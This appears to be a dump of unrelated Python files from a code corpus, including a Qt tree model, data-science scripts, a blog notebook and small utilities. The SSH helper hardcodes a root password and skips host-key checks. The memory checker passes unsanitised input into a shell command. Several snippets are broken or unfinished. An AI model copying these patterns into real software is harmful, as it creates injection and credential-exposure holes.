return self.getItem(index).checkState
def headerData(self, section, orientation, role=QtCore.Qt.DisplayRole):
if orientation == QtCore.Qt.Horizontal and role == QtCore.Qt.DisplayRole:
return self.rootItem.data(section)
return None
def index(self, row, column=0, parent=QtCore.QModelIndex()):
if parent.isValid() and parent.column() != 0:
return QtCore.QModelIndex()
parentItem = self.getItem(parent)
childItem = parentItem.child(row)
if childItem:
return self.createIndex(row, column, childItem)
else:
return QtCore.QModelIndex()
def insertColumns(self, position, columns, parent=QtCore.QModelIndex()):
self.beginInsertColumns(parent, position, position + columns - 1)
success = self.rootItem.insertColumns(position, columns)
self.endInsertColumns()
return success
def insertRows(self, position, rows, parent=QtCore.QModelIndex()):
# print('insert rows')
parentItem = self.getItem(parent)
self.beginInsertRows(parent, position, position + rows - 1)
success = parentItem.insertChildren(position, rows,
self.rootItem.columnCount())
self.endInsertRows()
return success
def parent(self, index):
if not index.isValid():
return QtCore.QModelIndex()
childItem = self.getItem(index)
parentItem = childItem.parent()
if parentItem == self.rootItem:
return QtCore.QModelIndex()
return self.createIndex(parentItem.childNumber(), 0, parentItem)
def removeColumns(self, position, columns, parent=QtCore.QModelIndex()):
self.beginRemoveColumns(parent, position, position + columns - 1)
success = self.rootItem.removeColumns(position, columns)
self.endRemoveColumns()
if self.rootItem.columnCount() == 0:
self.removeRows(0, self.rowCount())
return success
def removeRows(self, position, rows, parent=QtCore.QModelIndex()):
# print('remove rows')
parentItem = self.getItem(parent)
self.beginRemoveRows(parent, position, position + rows - 1)
success = parentItem.removeChildren(position, rows)
self.endRemoveRows()
return success
def rowCount(self, parent=QtCore.QModelIndex()):
parentItem = self.getItem(parent)
return parentItem.childCount()
def childCount(self, parent=QtCore.QModelIndex()):
return self.rowCount(parent)
def are_parent_and_child(self, parent, child):
while child.isValid():
if child == parent:
return True
child = child.parent()
return False
def setData(self, index, value, role=QtCore.Qt.EditRole):
if (role == QtCore.Qt.CheckStateRole and index.column() == 0):
self.layoutAboutToBeChanged.emit()
item = self.getItem(index)
item.setCheckState(value)
self.emit(QtCore.SIGNAL('checkChanged(QModelIndex)'), index)
cc = item.childCount()
if cc > 0:
for i in range(cc):
chindex = self.createIndex(i, 0, item.child(i))
self.setData(chindex,value,role)
item = self.getItem(index.parent())
cc = item.childCount()
no_checked = 0
if cc > 0:
# item.sketchTime = 0.0
# item.setData(5,item.sketchTime)
for i in range(cc):
if item.child(i).checkState == 2:
no_checked+=1
# item.sketchTime += item.child(i).sketchTime
# if item.child(i).childCount() == 0:
# item.setData(5,item.sketchTime)
if no_checked == cc:
item.setCheckState(2)
elif no_checked > 0:
item.setCheckState(1)
else:
item.setCheckState(0)
# self.emit(QtCore.SIGNAL('checkChanged(QModelIndex)'), index.parent())
self.layoutChanged.emit()
return True
# self.emit(QtCore.SIGNAL('dataChanged(QModelIndex)'), index)
if role != QtCore.Qt.EditRole:
return False
item = self.getItem(index)
# print(item)
colname = self.rootData[index.column()]
if colname in ['Voltage', 'Angle', 'Rate', 'Step', 'Color']:
cc = item.childCount()
if cc > 0:
for i in range(cc):
chindex = self.createIndex(i, index.column(), item.child(i))
self.setData(chindex,value,role)
result = item.setData(index.column(), value, index)
if result:
self.emit(QtCore.SIGNAL('redraw(QModelIndex,QModelIndex)'), index,index)
self.emit(QtCore.SIGNAL('dataChanged(QModelIndex,QModelIndex)'), index,index)
return result
def setHeaderData(self, section, orientation, value, role=QtCore.Qt.EditRole):
if role != QtCore.Qt.EditRole or orientation != QtCore.Qt.Horizontal:
return False
result = self.rootItem.setData(section, value)
if result:
self.headerDataChanged.emit(orientation, section, section)
return result
def getColumns(self):
columns = []
for i in range(self.columnCount()):
columns.append(self.headerData(i,QtCore.Qt.Horizontal))
return columns
def getRows(self):
rows = []
for i in range(self.rowCount()):
rows.append(self.getItem(self.index(i)))
return rows
def clearData(self):
self.rootItem = TreeItem(self.rootData, model=self)
def mimeTypes(self):
return ['application/x-qabstractitemmodeldatalist']
def mimeData(self, indexes):
mimedata = QtCore.QMimeData()
mimedata.setData('application/x-qabstractitemmodeldatalist', 'mimeData')
return mimedata
# def dropMimeData(self, data, action, row, column, parent):
# print ('dropMimeData %s %s %s %s' % (data.data('text/xml'), action, row, parent))
# return True
def dropMimeData(self, data, action, row, column, parent):
print(data, action, row, column, parent)
if data.hasFormat('application/x-qabstractitemmodeldatalist'):
bytearray = data.data('application/x-qabstractitemmodeldatalist')
data_items = self.decode_data (bytearray)
# Assuming that we get at least one item, and that it defines
# text that we can display.
text = data_items[0][QtCore.Qt.DisplayRole].toString()
for row in range(self.rowCount()):
name = self.item(row, 0).text()
if name == text:
number_item = self.item(row, 1)
number = int(number_item.text())
number_item.setText(str(number + 1))
break
else:
name_item = QtCore.QStandardItem(text)
number_item = QtCore.QStandardItem("1")
self.appendRow([name_item, number_item])
return True
else:
return QtCore.QStandardItemModel.dropMimeData(self, data, action, row, column, parent)
def decode_data(self, bytearray):
data = []
item = {}
ds = QtCore.QDataStream(bytearray)
while not ds.atEnd():
row = ds.readInt32()
column = ds.readInt32()
map_items = ds.readInt32()
for i in range(map_items):
key = ds.readInt32()
value = ""
ds >> value
item[QtCore.Qt.ItemDataRole(key)] = value
data.append(item)
return data
def setupModelData(self, data, parent):
layers = {layer.dxf.name:{'entity': layer} for layer in data.layers if layer.dxf.name!='0'}
# print([layer.dxf.name for layer in data.layers if layer.dxf.name!='0'])
columns = self.getColumns()
for ll in layers:
nchildren = len(data.modelspace().query('*[layer=="%s"]'%ll).entities)
if nchildren == 0:
continue
layer = layers[ll]
entity = layer['entity']
# print(ll, layer['entity'].is_on(), layer['entity'].is_locked())
parent.insertChildren(parent.childCount(), 1, self.rootItem.columnCount())
thisChild = parent.child(parent.childCount() -1)
thisChild.handle = layer
layer['parent'] = thisChild
item_data = {'Name': ll,
'Type': entity.dxftype(),
'Closed': 0,
'Voltage': thisChild.volt,
'show': layer['entity'].is_on(),
'Angle': thisChild.fillAngle,
'Rate': thisChild.rate,
'Step': thisChild.fillStep,
'Time': thisChild.sketchTime}
for column in range(len(columns)):
key = columns[column]
if key in item_data:
# print(column, item_data[key])
thisChild.setData(column, item_data[key])
ms = data.modelspace()
cnt = -1
for entity in ms:
cnt+=1
ll = entity.dxf.layer
if ll not in layers:
continue
# print(entity.dxftype())
if entity.dxftype() in ['IMAGE', 'SPLINE']:
continue
thisChild.is_closed = False
if entity.dxftype()=='POLYLINE':
data = np.array(list(entity.points()))
if(all(data[0] == data[-1])):
thisChild.is_closed = True
if entity.dxftype()=='LINE':
thisChild.is_closed = False
data = np.array([entity.dxf.start, entity.dxf.end])
parent = layers[ll]['parent']
parent.insertChildren(parent.childCount(), 1, self.rootItem.columnCount())
thisChild = parent.child(parent.childCount() -1)
thisChild.handle = entity
thisChild.color = entity.get_rgb_color()
item_data = {'Name': entity.dxf.handle,
'Type': entity.dxftype(),
'Closed': thisChild.is_closed,
'Voltage': thisChild.volt,
'show': thisChild.show,
'Angle': thisChild.fillAngle,
'Rate': thisChild.rate,
'Step': thisChild.fillStep,
'Time': thisChild.sketchTime,
'Color': entity.get_rgb_color()}
# print columnData
for column in range(len(columns)):
key = columns[column]
if key in item_data:
# print(column, item_data[key])
thisChild.setData(column, item_data[key])
|
# conversion pa / mbar / atm / psi
def multi_cnv_pression(val,unit):
if(unit == "pa"):
start_txt = "The convertion of " + str(val) + " pa in mbar/atm/psi = "
pa_txt = ""
mbar_txt = ", " + str(val/100) + " mbar"
atm_txt = ", " + str(val/101325) + " atm"
psi_txt = ", " + str(val/6895) + " psi"
if(unit == "mbar"):
start_txt = "The convertion of " + str(val) + " pa in pa/atm/psi = "
pa_txt = ", " + str(val*100) + " pa"
mbar_txt =""
atm_txt = ", " + str(val/1013.25) + " atm"
psi_txt = ", " + str(val/68.948) + " psi"
if(unit == "atm"):
start_txt = "The convertion of " + str(val) + " pa in pa/mbar/psi = "
pa_txt = ", " + str(val*101325) + " pa"
mbar_txt = ", " + str(val*1013.25) + " mbar"
atm_txt =""
psi_txt = ", " + str(val*14.6959) + " psi"
if(unit == "psi"):
start_txt = "The convertion of " + str(val) + " pa in pa/mbar/atm = "
pa_txt = ", " + str(val*6894.76) + " pa"
mbar_txt = ", " + str(val*68.9476) + " mbar"
atm_txt = ", " + str(val/14.696) + " atm"
psi_txt = ""
return start_txt + pa_txt + mbar_txt + atm_txt + psi_txt
print("Small routine to convert pression pa/mbar/atm/psi")
unit = input("Give the unit of pression to convert: ")
value = input("Give the value of pression: ")
print(multi_cnv_pression(float(value),unit))
again = input("Would you convert a new value? Yes or No : " )
if(again == "Yes" ):
print("Ok lets try again")
if(again== "No"):
print("Program terminated , see you soon")
|
class Node:
def __init__(self, value=None):
self.value = value
self.prev = None
self.next = None
class DoublyList:
def __init__(self):
self.head = None
self.tail = None
def __iter__(self):
tempNode = self.head
while tempNode:
yield tempNode
tempNode = tempNode.next
def __len__(self):
tempNode = self.head
count = 0
while tempNode:
count += 1
tempNode = tempNode.next
return count
def createList(self, value):
node = Node(value)
self.head = node
self.tail = node
def insertAt(self, position, value):
if self.head is None: # If the List is empty, it will create a list
self.createList(value)
return
else:
newNode = Node(value)
if position == 0:
newNode.next = self.head
self.head.prev = newNode
self.head = newNode
elif position >= self.__len__():
newNode.next = None
self.tail.next = newNode
newNode.prev = self.tail
self.tail = newNode
elif 0 < position < self.__len__():
index = 0
tempNode = self.head
while index < position - 1:
tempNode = tempNode.next
index += 1
newNode.next = tempNode.next
newNode.prev = tempNode
tempNode.next.prev = newNode
tempNode.next = newNode
else:
print('Invalid index entered ')
def deleteNode(self, position):
if self.head is None:
print('List is empty')
return
if self.__len__() == 1: # If there is 1 node in list
self.head = None
self.tail = None
else:
if position == 0:
newHead = self.head.next
newHead.prev = None
self.head = newHead
elif position >= self.__len__():
newTail = self.tail.prev
newTail.next = None
self.tail = newTail
elif 0 < position < self.__len__():
tempNode = self.head
index = 0
while index < position - 1:
tempNode = tempNode.next
index += 1
nextNode = tempNode.next.next # next node : Node next to the deleted node
nextNode.prev = tempNode
tempNode.next = nextNode
else:
print('Invalid index entered')
def deleteList(self):
tempNode = self.head
while tempNode:
tempNode.prev = None
tempNode = tempNode.next
self.head = None
self.tail = None
def traverse(self):
tempNode = self.head
while tempNode:
print(tempNode.value, end=' ')
tempNode = tempNode.next
print()
def reverse(self):
tempNode = self.tail
while tempNode:
print(tempNode.value, end=' ')
tempNode = tempNode.prev
print()
def search(self, data):
if self.head is None:
return 'List is empty'
else:
tempNode = self.head
while tempNode:
if tempNode.value == data:
return str(data) + ' found!!'
tempNode = tempNode.next
return str(data) + ' Not found'
if __name__ == '__main__':
List = DoublyList()
print([node.value for node in List])
List.insertAt(1, 1)
List.insertAt(1, 2)
List.insertAt(2, 3)
List.insertAt(3, 4)
List.insertAt(4, 5)
List.insertAt(5, 6)
print([node.value for node in List])
print('Length = ' + str(len(List)))
List.insertAt(0, 0)
List.insertAt(List.__len__(), 100)
print([node.value for node in List])
print('Length = ' + str(len(List)))
# List.traverse()
# List.reverse()
List.insertAt(2, 12)
print([node.value for node in List])
print('Length = ' + str(len(List)))
List.traverse()
List.reverse()
# print(List.search(230))
print('========================')
List.traverse()
List.deleteNode(List.__len__())
List.traverse()
List.reverse()
|
class Pattern(object):
def __init__(self):
super(Pattern, self).__init__()
def do_something(self):
print('I\'m a pattern!')
|
#!/usr/bin/env python
#plt.ion()
'''
QT (Quality Codes):
0=missing data
1=highest
2=standard
3=lower
4=questionable
5=bad
ST (Source Codes):
0 = No Sensor, No Data
1 = Real Time (Telemetered Mode) *
2 = Derived from Real Time *
3 = Temporally Interpolated from Real Time
4 = Source Code Inactive at Present
5 = Recovered from Instrument RAM (Delayed Mode) *
6 = Derived from RAM *
7 = Temporally Interpolated from RAM
'''
from netCDF4 import Dataset
from mpl_toolkits.basemap import Basemap
import numpy as np
import matplotlib.pyplot as plt
from datetime import datetime, timedelta
# load the data
PATH='sst_xyt_dy.cdf'
data=Dataset(PATH)
#define dimensions
lat=data.variables['lat'][:] #degrees_north
lon=data.variables['lon'][:] #degrees_east
time=data.variables['time'][:] # Centered Time
TIME = [datetime(1979,1,20,12,0,0)+int(i)*timedelta(days=1) for i in time]
#define variables
T=data.variables['T_20'][:,0,:,:] #TEMPERATURE degree_C
ST=data.variables['ST_6020'][:,0,:,:] #TEMPERATURE SOURCE
QT=data.variables['QT_5020'][:,0,:,:] #TEMPERATURE QUALITY
#only "good data"
tq=np.ma.masked_where(QT==0, np.ma.masked_where(QT>2, T))
#how many
points=np.zeros(len(time))
for t in range(len(time)):
points[t]=sum(sum(~tq.mask[t,:,:]))
fig = plt.figure(figsize=(10, 7))
ax = fig.add_subplot(111)
plt.plot(time,points)
#map
m = Basemap(projection='robin',
lat_0=0,
lon_0=-155,
resolution='c')
m.fillcontinents()
#interpolation grid
xxi,yyi=np.mgrid[np.min(lon):np.max(lon):129j,np.min(lat):np.max(lat):103j]
zzi=np.zeros((len(time),len(xxi[:,0]),len(yyi[0,:])))
for t in arange(len(time)):
grid= vstack((lon[np.where(tq.mask[t]==0)[1][:]],lat[np.where(tq.mask[t]==0)[0][:]])).T
data1=tq[t][np.where(tq.mask[t]==0)].data
zzi[t]=griddata(grid, data1, (xxi,yyi), method='linear')
zzi[t]=np.masked_where(zzi[t]==0,zzi[t])
#ploting
fig2 = plt.figure(figsize=(10, 7))
ax2 = fig2.add_subplot(111)
lon[np.where(tq.mask[t]==0)[1][:]].T,lat[np.where(tq.mask[t]==0)[0][:]].T
'''
colors = np.array(['#ffffff','#00cc00','#99ff66','#ffff00','#ff9933','#ff0000'])
x, y = m(*np.meshgrid(lon, lat))
plt.scatter(x,y,c=colors[QT[0,:,:]])
plt.show()
'''
t=[]
years=np.array([(d.year) for d in TIME])
months=np.array([(m.month) for m in TIME])
for yy in np.unique(years)[8:-1]:
for mm in np.unique(months):
pos=np.where(((years==yy) & (months==mm)))
# print pos
t.append(pos[0][np.where(points[pos]==(points[pos].max()))[0][0]])
indx=points[np.where((years=year & months==month))].max()
indx=np.where(years==year)
|
import paramiko
import sys
def ssh_command(ip, user, passwd, command):
client = paramiko.SSHClient()
#client.load_host_keys('/home/user/.ssh/known_hosts')
client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
try:
client.connect(ip, username=user, password=passwd)
ssh_session = client.get_transport().open_session()
if ssh_session.active:
ssh_session.exec_command(command)
print ssh_session.recv(1024)
except:
print "[!!] Error."
finally:
return
ssh_command('192.168.1.1', 'root', 'takion01093896', 'ifconfig') |
from django.shortcuts import render
import requests
from sklearn.externals import joblib
from .forms import PredictForm
from sklearn.externals import joblib
df = joblib.load('df.pkl')
def home(request):
if request.method == 'POST':
form = PredictForm(request.POST)
if form.is_valid():
model_columns = joblib.load('predict/model_columns.pkl')
data = {}
for column in model_columns:
data[column] = 0
f = form.cleaned_data
print(f)
districts = ['Железнодорожный',
'Кировский',
'Ленинский',
'Октябрьский',
'Первомайский',
'Пролетарский',
'Советский']
for key in f.keys():
print(f[key])
print(data.get(key))
if key == 'district':
data['district_' + f[key]] = 1
elif key == 'repair_type':
data['repair_type_' + f[key]] = 1
elif key == 'home_type':
data['home_type_' + f[key]] = 1
elif isinstance(f[key], bool):
data[key] = int(f[key])
else:
data[key] = f[key]
print(data)
predict_price = int(requests.post('http://127.0.0.1:12345/predict', json=[data]).json()['prediction'][0])
df_tmp = df[df['rooms'] == f['rooms']]
df_tmp = df_tmp[abs(df_tmp['square'] - f['square']) <= 10]
df_tmp = df_tmp[abs(df_tmp['price'] - predict_price) <= 300000]
df_tmp = df_tmp[df_tmp['district'] == f['district']]
print(df_tmp)
predict = ''
try:
predict = df_tmp.iloc[0].to_dict().items()
# for key, value in df_tmp.iloc[0].to_dict().items():
except:
predict = 'Try to choose another districts'
else:
predict = ''
return render(request, 'predict/home.html', {'title': 'It works!', 'form': PredictForm(), 'predict': predict})
|
# python shallownet_animals.py --dataset ../datasets/animals/
import sys
sys.path.append("..")
from pyimagesearch.preprocessing import ImageToArrayPreprocessor
from pyimagesearch.preprocessing import SimplePreprocessor
from pyimagesearch.datasets import SimpleDatasetLoader
from pyimagesearch.nn.conv import ShallowNet
from sklearn.preprocessing import LabelBinarizer
from sklearn.model_selection import train_test_split
from sklearn.metrics import classification_report
from keras.optimizers import SGD
from imutils import paths
import matplotlib.pyplot as plt
import numpy as np
import argparse
from pyimagesearch.nn.conv import MiniVGGNet
from keras.callbacks import ModelCheckpoint
import os
from pyimagesearch.nn.conv import LeNet
# construct the argument parser and parse the arguments
ap = argparse.ArgumentParser()
ap.add_argument("-d", "--dataset", required=True, help="path to input dataset")
ap.add_argument("-w", "--weights", required=True, help="path to weights directory")
args = vars(ap.parse_args())
# grab the list of images that we'll describing
print("[INFO] loading images...")
imagePaths = list(paths.list_images(args["dataset"]))
# initialize the image preprocessor
sp = SimplePreprocessor(32, 32)
iap = ImageToArrayPreprocessor()
# load the dataset from disk then scale the raw pixel intensities
sdl = SimpleDatasetLoader(preprocessors=[sp, iap])
(data, labels) = sdl.load(imagePaths, verbose=500)
data = data.astype("float") / 255.0
# pritition the into training and testing splits using 75% of
# the data for training and the remaining 25% fir testing
(trainX, testX, trainY, testY) = train_test_split(data, labels, test_size=0.25, random_state=42)
# convert the labels from integers to vectors
trainY = LabelBinarizer().fit_transform(trainY)
testY = LabelBinarizer().fit_transform(testY)
# initialize the optimizer and model
print("[INFO] compiling model...")
opt = SGD(lr=0.01)
model = LeNet.build(width=32, height=32, depth=3, classes=3)
model.compile(loss="categorical_crossentropy", optimizer=opt, metrics=["accuracy"])
# construct the callback to save only the *best* model to disk
# based on the validation loss
fname = os.path.sep.join([args["weights"], "weights-{epoch:03d}-{val_acc:.4f}.hdf5"])
checkpoint = ModelCheckpoint(fname, monitor="val_acc", mode="max", save_best_only=True, verbose=2)
callbacks = [checkpoint]
# train the network
print("[INFO] training network....")
H = model.fit(trainX, trainY, validation_data=(testX, testY),
batch_size=64,
epochs=40,
callbacks=callbacks,
verbose=2)
|
#!/usr/bin/env python
import os
import re
import sys
from pipe import * # http://pypi.python.org/pypi/pipe/1.3
from subprocess import Popen, PIPE
if len(sys.argv) > 1 and sys.argv[1] == '-h':
print "stats: Calcule des status sur quelqu'un"
print "N'a besoin que d'une partie de son nom pour le retrouver (perl regex)"
print "Exemple: stats oa"
sys.exit(0)
search = re.search('[a-zA-Z0-9*.]*', sys.argv[1] if len(sys.argv) > 1 else '.*')
if search is None or search.group(0) == '':
print "Stats de qui ?"
sys.exit(0)
else :
search = search.group(0)
def wc(logfile):
return int(Popen(['wc', '-l', os.path.join('logs/users', logfile)],
stdout=PIPE).communicate()[0].split()[0])
stats = os.listdir('logs/users') \
| where(lambda user: re.search(search, user, re.IGNORECASE) is not None) \
| select(lambda user: (user, wc(user))) \
| as_dict
if len(stats) > 0:
stats.iteritems() \
| sort(cmp=lambda x, y: y[1] - x[1]) \
| select(lambda stat: "%s: %d" % (stat[0], stat[1])) \
| take(10) \
| concat \
| lineout
if len(stats) > 1:
print 'Total: %d' % sum(stats.values())
|
# FIXME : Complete the program. No need for defining new functions
# setup variables for counters among other things
num_count = 0
sum_count = 0
avg_count = 0
max_num = 0
min_num = 0
print('Simple Statistics')
numbs = str(input('Please enter numbers, separated by a space:\n'))
my_numbs = [float(numb) for numb in numbs.split()]
sum_count = sum(my_numbs)
my_numbs.sort()
max_num = my_numbs[-1]
min_num = my_numbs[0]
num_count = len(my_numbs)
avg_count = sum_count / num_count
print(f'The number of entered numbers is: {num_count}')
print(f'The Sum of the numbers is: {sum_count}')
print(f'The Average is: {avg_count}')
print(f'The Maximum number is: {max_num}')
print(f'The Minimum number is: {min_num}') |
import time
import functools
def log(text=None):
def decorator(f):
@functools.wraps(f)
def wrapper(*args, **kwargs):
result = '{} {} {}'.format(text, f(*args, **kwargs), text)
return result
return wrapper
return decorator
def time_elapse(text=None):
def decorator(func):
@functools.wraps(func)
def wrapper(*args, **kwargs):
t0 = time.time()
result = 'call: {} {} time elapse: {} {}'.format(func.__name__, func(*args, **kwargs), time.time() - t0,
text)
return result
return wrapper
return decorator
@log('****')
@time_elapse('....')
def function(x, y):
return x * y
if __name__ == '__main__':
print(function(4, 20))
|
from setuptools import setup, find_packages
setup(
name='Group_6_predict',
version='0.1',
packages=find_packages(exclude=['tests*']),
license='MIT',
description='This package extract tweets',
#long_description=open('README.md').read(),
install_requires=['numpy'],
url='https://github.com/Toby-masuku/analysePredict.git',
authors='Christopher Mahlangu, Marcio Maluka, Phiwayinkosi Hlatshwayo, Toby Masuku, Tumisang Sentle',
# maintainer='Group 6 members/authors'
author_email='marciomaluka@ymail.com'
)
# from setuptools import setup, find_packages
# setup(
# name='Group_6_predict',
# version='0.1',
# packages=find_packages(exclude=['tests*']),
# license='MIT',
# description='This package extract tweets',
# long_description=open('README.md').read(),
# install_requires=['numpy'],
# url='https://github.com/Toby-masuku/analysePredict',
# author='marcio Maluka')
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import random
import os
def getPid(server):
pid_nu = os.popen('pidof %s'%(server)).read().strip()
return pid_nu
def getMem(nu):
with open('/proc/%s/status'%(nu)) as f:
for line in f.readlines():
if line.startswith('VmRSS'):
mem_ = int(line.split()[1])
print mem_
break
return mem_
def getSysMem():
with open('/proc/meminfo') as f:
for line in f:
if line.startswith('MemTotal'):
mem_all = int(line.split()[1])
break
return mem_all
def main():
server = raw_input('please input you server : ')
pid_nu = getPid(server)
print pid_nu
all_server = 0
for nu in pid_nu.split():
mem = getMem(nu)
all_server += mem
mem_sys = getSysMem()
print all_server,mem_sys
v =(float(all_server) / float(mem_sys)) * 100
v = str('%.2f'%(v)) + '%'
print v
all_server_mem = str('%.2f'%(all_server / 1000.0)) + 'M'
print '%s 占用内存 %s'%(server, all_server_mem)
print '%s 占用的百分比 %s'%(server, v)
if __name__ == '__main__':
main()
|
# -*- coding: utf-8 -*-
# ---
# jupyter:
# jupytext:
# formats: ipynb,py:light
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.10.2
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # "Working in fastpages"
# > "Getting this site setup"
#
# - toc: false
# - branch: master
# - badges: false
# - comments: true
# - categories: [fastpages, jupyter]
# - image: "images/thumbnails/7538107210_cf213e2a7c_c.jpeg"
# - hide: false
# - search_exclude: false
# 
# ## Hello, World!
# Well that was relatively painless.
#
# Here's a site made out of (mostly) jupyter notebooks. This post is just a jupyter notebook. 😎 Thanks, [fastpages](https://github.com/fastai/fastpages)! 🚀
# ## What Was Easy
# - **Setup is a breeze**: fastpages made it really easy to setup from their repo. Using an auto-generated pull request, was able to get a new repo up and running with no trouble.
# - **Connect to existing stuff**: Connecting to GitHub Pages site [zachbogart.github.io](https://zachbogart.github.io/) was easy. Just set it as the `baseurl`.
# - **Tracking Notebooks**: Was worried that the use of jupyter notebooks to render the posts might mean that the `.ipynb` files have to be git tracked. This can be a pain cause there is a lot in each notebook, so running a notebook without changing code will still lead to git changes, which are difficult to parse without additional tools.
# - However, at least for this post, [jupytext](https://jupytext.readthedocs.io/en/latest/index.html) works like a charm!{% fn 1 %} Can work in jupyter notebooks, track python script versions of them, and have it all be rendered to a site. Super awesome. Hope it lasts...
# ## What Will Require More Understanding
#
# - **Handling Images**: For previous posts, I used images as thumbnails *and* at the start of each post. In my experimenting, was finding I had to copy the image in two places: `my_icons` in the `_notebooks` folder and in the `images` folder. Wondering if there is a cleaner way to include an image in just one place (the [docs](https://github.com/fastai/fastpages#setting-an-image-for-social-media) mention that the social media image can only be set under `images`).
# - **It's a big machine**: The repo can be pretty intimidating. There are a lot of folders that make it go and a bunch of files with "THIS FILE WAS AUTOGENERATED! DO NOT EDIT!" penciled in. Will take some getting used to, getting comfortable with the setup and knowing what parts I should touch. There are some files that I could burn myself on, so I will go slow, use oven mitts, and try not to void any warranties.
# I'll keep [the docs](https://github.com/fastai/fastpages#welcome-to-fastpages) handy.
#
# Till next time!
# + [markdown] jupyter={"source_hidden": true}
# 
# -
# #### Image Credit
# - [waving hello](https://thenounproject.com/search/?creator=4129988&q=hello&i=3169895) by Zach Bogart from the [Noun Project](https://thenounproject.com/zachbogart/)
# - [Differential Analyzer](https://www.flickr.com/photos/nasacommons/7538107210/in/photolist-cu7LDG-cu7KiW-cubwMw-cu7Lim-cu7L1S-cu7L9d-bH9Ff6-kUBmeB-cubwDj-qAj3oW-cu7MDs-2hXAdPi-2jGCtk8-2jGCtj1-fpKVja-dWrkiU-dMAhAv-23Pqy53-dMFR2m-dMFRby-dMFRko-dMAhPP-dMFRaU-wLozW8-dMFTUW-2k3Gwre-2k3GwrE-oeuB1P-2k3Y9g1-2k3GwsG-2k3Xtps-2k3CGnm-2k3TEak-2k3Gwvs-2k3CGoi-2k3CGnX-2k3Gwsg-2k3Y9fp-2k3CGn1-2k3HdRZ-2k3Gwsr-2k3GwvN-2k3GwqC-2k3Gwr4-2k3YBEu-2k3Kuuo-2k3GwvC-2k3YBDT-2k3EYKc-2k3YBEV) from "NASA on The Commons" on Flickr Commons
# - Cool Description: *Differential Analyzer built under the direction of Harold Mergler in the Instrument Research Section. The technician is preparing a data report. This equipment was located at the Lewis Flight Propulsion Laboratory, LFPL, now John H. Glenn Research Center at Lewis Field, Cleveland Ohio.*
# {{ '[Jupytext](https://github.com/mwouts/jupytext) is a super useful way to save off jupyter notebooks as other formats. I use it all the time. Pairing a notebook is easy and you can just set it and forget it. Note: If in [JupyterLab](https://jupyterlab.readthedocs.io/en/stable/), use "View > Activate Command Palette" or "Shift + Cmd + C" to "Pair..." a notebook format. Took me a while to find out how to do this! ' | fndetail: 1 }}
|
from numpy import array
from keras.models import Sequential
from keras.layers import Dense, LSTM
# 데이터
x = array([[1, 2, 3], [2, 3, 4], [3, 4, 5], [4, 5, 6], [5, 6, 7], [6, 7, 8], [7, 8, 9], [8, 9, 10], [9, 10, 11], [10, 11, 12], [20000, 30000, 40000], [30000, 40000, 50000], [40000, 50000, 60000], [100, 200, 300]])
y = array([4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 50000, 60000, 70000, 400])
# 데이터 전처리
from sklearn.preprocessing import MinMaxScaler, StandardScaler
from sklearn.preprocessing import RobustScaler, MaxAbsScaler
sc = StandardScaler() # 표준화
sc.fit(x)
x = sc.transform(x)
mms = MinMaxScaler() # 정규화 (데이터를 0 ~ 1 사이로 재조정)
mms.fit(x)
x = mms.transform(x)
# rs = RobustScaler()
# rs.fit(x)
# x = rs.transform(x)
# mas = MaxAbsScaler()
# mas.fit(x)
# x = mas.transform(x)
print(x)
# Train / Test 으로 분리
from sklearn.model_selection import train_test_split
x_train, x_test, y_train, y_test = train_test_split(x, y, train_size=0.75, random_state=66, shuffle=False)
print(x_train.shape)
# 모델 생성
from keras.models import Sequential, Model
from keras.layers import Dense, Input
input1 = Input(shape=(3,))
model = Dense(1024)(input1)
model = Dense(512)(model)
model = Dense(256)(model)
model = Dense(128)(model)
model = Dense(64)(model)
model = Dense(32)(model)
model = Dense(16)(model)
output1 = Dense(1)(model)
model = Model(inputs = input1, outputs = output1)
# 모델 요약
model.summary()
model.compile(loss='mse', optimizer = 'adam', metrics = ['mae'])
# Early_Stopping
from keras.callbacks import EarlyStopping
early_stopping = EarlyStopping(monitor='loss', patience=1000, mode='auto')
# 모델 학습
model.fit(x_train, y_train, epochs = 100000, batch_size=3, verbose=0, callbacks=[early_stopping])
# 모델 평가
loss, mae = model.evaluate(x_test, y_test, batch_size=3)
print('loss: ' , loss)
print('mae: ', mae)
# 예측
y_predict = model.predict(x_test, batch_size=3)
# R2 구하기
from sklearn.metrics import r2_score
r2_y_predict = r2_score(y_test, y_predict)
print("R2: ", r2_y_predict)
import numpy as np
x_prd = np.array([[250, 260, 270]]) #한개가 더 늘어나야함
# x_prd = np.transpose(x_prd)
aaa = model.predict(x_prd, batch_size=1)
print(aaa) |
'''
Descripttion: 小型矩阵向量化未必比naive快,但大型矩阵向量化远超naive
Version: 1.0
Author: ZhangHongYu
Date: 2021-03-08 17:26:11
LastEditors: ZhangHongYu
LastEditTime: 2021-05-30 16:30:09
'''
import numpy as np
import time
eps = 1e-6
n = 6 #迭代次数
#向量化实现
def Jocobi(A, b):
assert(A.shape[0] == A.shape[1] == b.shape[0])
x = np.zeros(b.shape, dtype=np.float32)
d = np.diag(A) #diag即可提取A的对角线元素,也可构建对角阵
R = A - np.diag(d) #r为余项
# U = np.triu(R) #如果想获取不含对角线的L和U需如此,直接np.triu()得到的是含对角线的
# L = np.tril(R)
# 迭代次数
for t in range(n):
x = (b-np.matmul(R, x))/d
return x
#普通实现
def Jocobi_naive(A, b):
assert(A.shape[0] == A.shape[1] == b.shape[0])
x = np.zeros(b.shape, dtype=np.float32)
# 迭代次数
for t in range(n):
#普通实现
for i in range(x.shape[0]):
val = b[i]
for j in range(A.shape[1]):
if j != i :
val -= A[i, j] * x[j]
x[i] = val/A[i][i]
return x
if __name__ == '__main__':
# A一定要是主对角线占优矩阵
# A = np.array(
# [
# [3, 1, -1],
# [2, 4, 1],
# [-1, 2, 5]
# ],dtype=np.float32
# )
A = np.eye(1000, dtype=np.float32)
# b = np.array(
# [4, 1, 1],dtype=np.float32
# )
b = np.zeros((1000,), np.float32)
start1 = time.time()
x1 = Jocobi_naive(A, b)
end1 = time.time()
print("time: %.10f" % (end1-start1))
print(x1)
start2 = time.time()
x2 = Jocobi(A, b)
end2 = time.time()
print("time: %.10f" % (end2 - start2))
print(x2)
#print(A, "\n", b)
|
from ..security import passwd, passwd_check
def test_passwd_structure():
p = passwd('passphrase')
algorithm, hashed = p.split(':')
assert algorithm == 'argon2'
assert hashed.startswith('$argon2id$')
def test_roundtrip():
